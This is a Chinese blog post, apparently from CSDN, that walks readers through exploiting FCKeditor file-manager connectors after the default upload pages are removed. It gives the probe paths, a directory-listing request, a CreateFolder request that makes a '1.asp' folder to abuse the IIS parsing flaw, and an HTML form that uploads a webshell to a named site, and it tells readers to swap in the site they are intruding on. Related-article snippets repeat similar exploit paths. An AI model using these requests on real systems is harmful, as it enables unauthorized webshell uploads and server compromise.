解决Fckeditor删除所有上传页面如何上传

最新推荐文章于 2022-09-13 18:46:34 发布
原创 最新推荐文章于 2022-09-13 18:46:34 发布 · 821 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#fckeditor #file #iis #action #image #html

本文详细介绍了如何利用Fckeditor的上传漏洞进行攻击,包括确定版本、检查上传页面、使用ASPx目录创建特殊目录并上传webshell的过程。

 首先,你得确定下Fckeditor的版本。

 
/FCKeditor/editor/dialog/fck_about.html

其次,你确定下以下几个上传页面是否真的被删除了呢?
 
/FCKeditor/editor/filemanager/browser/default/browser.html
 
/FCKeditor/editor/filemanager/browser/default/connectors/test.html
 
/FCKeditor/editor/filemanager/upload/test.html
 
/FCKeditor/editor/filemanager/connectors/test.html
 
/FCKeditor/editor/filemanager/connectors/uploadtest.html

 
嗯,好吧,都已经删除了,真是太倒霉了,怎么办,确认下这些文件有哪个存在的么 
 
/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
 
/fckeditor/editor/filemanager/connectors/asp/connector.asp
 
/fckeditor/editor/filemanager/connectors/php/connector.php
 
 
如果存在,那太好了,你可以继续看下去了,我这里以aspx的为例
 
 
1.查看Media目录下的文件:
 
 
/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Media&CurrentFolder=%2F
 
 
 
红色Media可以更改为File或者image,相应的进入文件或者图片目录下
 
 
2.利用iis解析漏洞创建1.asp特殊目录
 
 
fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Media&CurrentFolder=%2F&NewFolderName=1.asp
 
 
 
红色的是对应的Media目录,蓝色的是特殊目录名字
 
 
 
 3.构建表单,上传webshell到特殊目录
 
 
 
<form id="frmUpload" enctype="multipart/form-data" action="http://www.itatpro.com/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=FileUpload&Type=Media&CurrentFolder=%2Fasp.asp" method="post">
 
Upload a new file:<br>
 
<input type="file" name="NewFile" size="50"><br>
 
<input id="btnUpload" type="submit" value="Upload">
 
</form>
 
 
将以上代表保存为HTML格式,http://www.xxx.com修改成你入侵的网站地址,Type=Media是对应的Media目录,1.asp为特殊目录名。 

 
最后的一些提示
 
 
上传之后的路径需要你在上传表单里面的代码里找,当然,他的呈现方式是一个上传好了的文件名,全路径必须你自己组合,我相信你是会的。如果访问之后发现无法访问,试着上传一张正确的图片,再进行访问,如果访问成功,说明管理员已经补上了IIS路径解析漏洞,那你得另找出路了。
【渗透测试】--- FCKeditor文本编辑器漏洞
qq_43168364的博客
12-25 1万+
一、FCKeditor编辑器漏洞 FCKeditor编辑器是一款强大的所见即所得文本编辑器,现在已经更名为:CKEditor fckeditor的常见敏感目录(FCK有时要小写) (1) 查看版本信息 /FCKeditor/editor/dialog/fck_about.html /FCKeditor/_whatsnew.html (2) 默认上传页面 /FCKeditor/editor/filemanager/browser/default/browser.html /FCKeditor/edito
Fckeditor漏洞整理集合
E4857632的博客
08-23 1116
1、查看编辑器版本 /fckeditor/editor/dialog/fck_about.html 2、爆绝对路径 FCKeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php(支持php的通杀) /FCKeditor/editor/filemanager/bro...
F4CK 游戏通关历险记
要不,单步调试走起?
01-16 2114
游戏地址 声明:本博文意在记载作者自己的点滴,同时欢迎更多的朋友走上hackme和crackme这条路。 注意:尽量自己动手,尽量不给f4ck带来麻烦。 第一关 随便哪个抓包软件(我用的是WSExplorer),然后就发现了地址: http://game.f4ck.net/jfasdsdlml.html   第二关 用python写了个脚本: __author__="ouya
FCKeditor上传设置
MascotDai的专栏
10-30 1179
看大家要FCKeditor上传设置的部分,所以仔细找了下,以前看到别人说FCKeditor上传漏洞,所以一直没有用过此功能!希望能够解决大家的问题!因版本更新问题,可能具体行数不一致,请大家仔细修改!谢谢大家的关注!FCKeditor目前已经更新到2.4.2版,详情请看官方http://www.fckeditor.net/上传文件设置简洁fckconfig.js 134 135 行[
fckEditor漏洞修复,彻底禁用fckEditor上传功能(含防止Type漏洞问题)
我在哈佛念过佛、我在牛津放过牛、我在剑桥建过桥、我在麻省理工理过发。- 程序员之家
11-30 2762
线编辑器中,FCKeditor是我用过最爽的,也是目前互联网上最好的编辑器,功能强大,支持多种浏览器, 无平台限制,可以和多种WEB语言融合,多语言支持,而且还支持开源!^-^ 可它的确是太强大了! 以致于可以被别有用心的人轻易利用。 比如不想禁止使用文件上传功能,请看下面内容: 环境以Asp.net开发来进行讲解,步骤如下: 1、获取文件 我们可以从http://www.fckeditor.net/download下载两个压缩文件,第一个是FCKeditor.Net,最新版本是2.5,它主要包
Fallout4 CreationKit配置总结
棠诗月缘
09-13 2086
3.安装f4ck_loader至游戏根目录,原址:https://www.nexusmods.com/fallout4/mods/51165?7.打开游戏根目录的fallout4_test.ini,将Unicode=false改为Unicode=true。链接:https://pan.baidu.com/s/1GmRNnpOcYY2JwE8hJSwhcA。4.安装F4 Creation Kit Fixes至游戏根目录,原址:同上。5.启动Mod Organizer ,配置f4ck,如图。
fckeditor 上传漏洞解决
04-12
解决fckeditor 上传漏洞,类似asp;.jpg asp.jpg
FckEditor 上传图片后图片变小了!问题解决
10-29
FCKEditor是早期一款流行的在线文本编辑器,广泛应用于网页中实现富文本编辑功能。该编辑器能够支持图片上传、格式排版、样式管理等多种文本编辑操作。在使用FCKEditor时,用户可能会遇到一些技术问题,其中上传图片...
ASp.net下fckeditor配置图片上传最简单的方法
10-29
上传页面的代码是用C#编写的,并包含在一个***的.aspx页面中。其中的JavaScript部分负责初始化编辑器,并设置图片上传的地址。而C#的后端代码则处理文件上传逻辑,包括安全检查、路径创建、文件保存等。 值得注意的...
fckeditor添加多文件批量上传组件
06-14
2. **集成组件**:将所选的上传组件的JavaScript和CSS文件引入到FCKeditor页面中。确保它们与FCKeditor的样式和脚本兼容,并且不会冲突。 3. **创建上传按钮**:在FCKeditor的工具栏中添加一个用于触发批量上传的...
fckeditor定制及上传中文文件问题
07-27
标题 "fckeditor定制及上传中文文件问题" 涉及的是在使用FCKeditor这款开源富文本编辑器时,遇到的关于自定义编辑器功能以及处理中文文件上传的挑战。FCKeditor是一款广泛应用于Web开发的JavaScript富文本编辑器,它...
FCKeditor编辑器漏洞
墨鱼菜鸡
04-07 315
目录 FCKeditor asp网页 aspx网页 php网页 jsp网页 FCKeditor FCKeditor是一个功能强大支持所见即所得功能的文本编辑器,可以为用户提供微软office软件一样的在线文档编辑服务。它不需要安装任何形式的客户端,兼容绝大多数主流浏览器,支持ASP.Net、...
Fckeditor漏洞利用全面解析
weixin_34413802的博客
06-27 614
第一步:查看编辑器版本 FCKeditor/_whatsnew.html ————————————————————————————— 第二步. Version 2.2 版本 Apache+linux 环境下在上传文件后面加个.突破!测试通过。 ————————————————————————————— 第三步.Version <=2.4.2 For php ...
fckeditor 上传图片 php_Fckeditor 2.4.2 php任意上传文件漏洞修复
weixin_42468240的博客
03-09 406
1、漏洞描述fckeditor/editor/filemanager/upload/php/ 目录下config.php 文件global $Config ;// SECURITY: You must explicitelly enable this "uploader".$Config['Enabled'] = false ;// Set if the file type must be con...
Fckeditor jsp版漏洞利用方法:
Macroli
06-26 8137
<br />http://www.xxx.com/fckeditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=%2F<br />用这个地址查找上传图片的路径,存在漏洞的话应该返回一个xml文件,如图<br /><br />注意红框的地方,是上传后图片存放的地址。<br />然后用<br />http://www.xxx.com/fckedit
解决Fckeditor删除所有上传页面如何上传入侵
weixin_30596165的博客
12-30 117
好久没有脚本入侵了,今天因为参加了一个比赛,然后证书居然需要钱来买的,就很不爽,百度了下其官方网,进行了一次安检,结果是没有成功,因为iis的文件解析漏洞补上了,不过学到了一些Fckeditor在没有上传页面的情况下的入侵方式。首先,你得确定下Fckeditor的版本。 /FCKeditor/editor/dialog/fck_about.html其次,你确定下以...
FCKeditor漏洞总结 经常被挂马的网站请注意(转)
b9264826的博客
11-05 567
FCKeditor介绍FCKeditor是一款功能强大的开源在线文本编辑器(DHTML editor),它使你在web上可以使用类似微软Word 的桌面文本编辑器的许多强大功能。它是轻量级且不必在客户端进行任何方式的安装。 FCKeditor兼容Firefox, Mozilla, Netscape 和IE。FCKeditor官司方网址:http://www.fckeditor.net/F...
nginx 上传文件漏洞_文件上传及解析漏洞
weixin_30444517的博客
12-29 1908
注:本文仅供学习参考文件上传定义:文件上传漏洞是指网络攻击者上传了一个可执行的文件到服务器并执行。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,部分文件上传漏洞的利用技术门槛非常的低,对于攻击者来说很容易实施。即便很容易被攻击者利用漏洞,但是在今天的现代互联网的Web应用程序,它是一种常见的要求,因为它有助于提高业务效率。企业支持门户,给用户各企业...
FCKEditor增强:实现附件上传功能
综上所述,fckeditor(支持上传附件)的功能是其作为内容管理工具的重要组成部分,为网站提供了灵活的文件管理解决方案。对于希望提升内容编辑便捷性和效率的网站管理员和开发人员来说,FCKeditor提供了一个出色的...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值